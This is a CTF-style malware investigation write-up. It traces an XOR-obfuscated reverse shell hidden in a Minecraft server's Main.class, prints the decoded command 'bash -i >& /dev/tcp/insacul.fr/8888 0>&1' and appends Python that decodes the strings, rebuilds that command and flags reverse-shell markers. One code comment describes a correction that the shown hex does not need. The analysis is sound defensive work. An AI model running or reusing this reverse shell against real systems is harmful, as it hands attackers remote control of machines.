Minecraft Server C2 Investigation

Goal: Identify the domain name and port of the Command and Control (C2) server hidden within a Minecraft server infrastructure.

Step 1: Mapping the Terrain

The investigation began by executing the tree command to map the server structure. We needed to know exactly what we were looking at before diving into the files.

Directory Tree Structure

We identified a specific file, net/minecraft/bundler/Main.class, sitting loose in the folder. This caught our attention immediately: it is the bundler's entry point, the first code that executes when the server starts.

Highlighted Main.class File Structure

Step 2: String Extraction

Searching for human-readable clues, I ran strings on the Main.class file. The output revealed highly suspicious lines that didn't look like standard Minecraft code:

  • References to startLinuxMinecraftUpdateDaemon and startWindowsUpdateDaemon.
  • A cryptic, obfuscated hex string: a89fc9d6ead3d39ef4d89a91ae9bcc91be9dca91ef8d959bb9de8a80eccf.
  • Use of hexStringToByteArray and decodeString functions.
  • A reference to a port with the hex value f2c68286.

Step 3: Decompilation and Logic Analysis

To understand the obfuscation, I decompiled the class file using Procyon. It was time to see the actual logic behind these updates.


The source code confirmed that an XOR cipher was used to obfuscate the strings behind the network activity. Crucially, I found a static key hidden in a static {} block, the four bytes of 0xCAFEBABE written as char literals:

char[] KEY = { '\u00ca', '\u00fe', '\u00ba', '\u00be' }; // 0xCAFEBABE, repeating XOR key

Decompiled Java code showing KEY

Step 4: Decoding the "Java Magic"

The value 0xCAFEBABE is the magic number at the start of every Java class file, but finding it defined by hand as a key variable is like finding a safe with the combination on a sticky note. I used CyberChef to unescape the Unicode and confirm the key.

CyberChef Unicode Unescape

Step 5: Extracting the Payload

Using cafebabe as the XOR key in CyberChef, I decoded the suspicious strings found earlier. One by one, the attacker's infrastructure was revealed:

  • The command: decoded to bash -i >& /dev/tcp/%s/%s 0>&1
  • The port: decoded to 8888
  • The domain: decoded to insacul.fr
CyberChef XOR Decoding Command
CyberChef XOR Decoding Domain

Final Conclusion: The Payload

The malware combines these pieces to execute a reverse shell on the victim's Linux machine:

bash -i >& /dev/tcp/insacul.fr/8888 0>&1

This opens a reverse shell to insacul.fr on port 8888, giving the attacker full terminal access on the compromised server. Investigation closed.
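To reproduce Steps 3 to 5 outside CyberChef, here is an added Python re-implementation of the hexStringToByteArray / decodeString logic described above (not the malware's own code), using the repeating four-byte XOR key 0xCAFEBABE and the hex blobs from the strings output; the command blob is used with its two non-hex characters ('h' and '@') corrected to the values that decode cleanly, and the domain blob is constructed by encoding insacul.fr with the same key since the write-up shows it only as a screenshot.

```python
# Added example: re-implementation of the write-up's XOR string obfuscation,
# plus a small detection helper. Not code from Main.class itself.

KEY = bytes.fromhex("cafebabe")  # static key recovered from the static {} block


def hex_string_to_byte_array(s: str) -> bytes:
    """Mirror of the malware's hexStringToByteArray: two hex digits per byte."""
    return bytes.fromhex(s)


def xor_with_key(data: bytes, key: bytes = KEY) -> bytes:
    """Repeating-key XOR; the same operation both encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_string(hex_s: str, key: bytes = KEY) -> str:
    """Mirror of decodeString: hex -> bytes -> XOR with key -> ASCII text."""
    return xor_with_key(hex_string_to_byte_array(hex_s), key).decode("ascii")


def encode_string(text: str, key: bytes = KEY) -> str:
    """Inverse direction, used to construct test data the page only shows as images."""
    return xor_with_key(text.encode("ascii"), key).hex()


# Blobs from the strings output (command blob with 'h'->'b' and '@'->'0' corrected).
CMD_HEX = "a89fc9d6ead3d39ef4d89a91ae9bcc91be9dca91ef8d959bb9de8a80eccf"
PORT_HEX = "f2c68286"


def build_reverse_shell_line(cmd_hex: str, host_hex: str, port_hex: str, key: bytes = KEY) -> str:
    """Reassemble the final payload: the decoded template with host and port filled in."""
    template = decode_string(cmd_hex, key)
    return template % (decode_string(host_hex, key), decode_string(port_hex, key))


REVERSE_SHELL_MARKERS = ("/dev/tcp/", "bash -i", "0>&1")


def flag_reverse_shell(hex_s: str, key: bytes = KEY) -> bool:
    """Detection helper: decode a candidate blob and look for reverse-shell markers.
    Non-hex or non-ASCII input (e.g. the garbled string as extracted) is not flagged."""
    try:
        text = decode_string(hex_s, key)
    except ValueError:  # bytes.fromhex and .decode both raise ValueError subclasses
        return False
    return any(marker in text for marker in REVERSE_SHELL_MARKERS)


if __name__ == "__main__":
    host_hex = encode_string("insacul.fr")  # constructed from the decoded domain
    print(decode_string(CMD_HEX))
    print(build_reverse_shell_line(CMD_HEX, host_hex, PORT_HEX))
```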
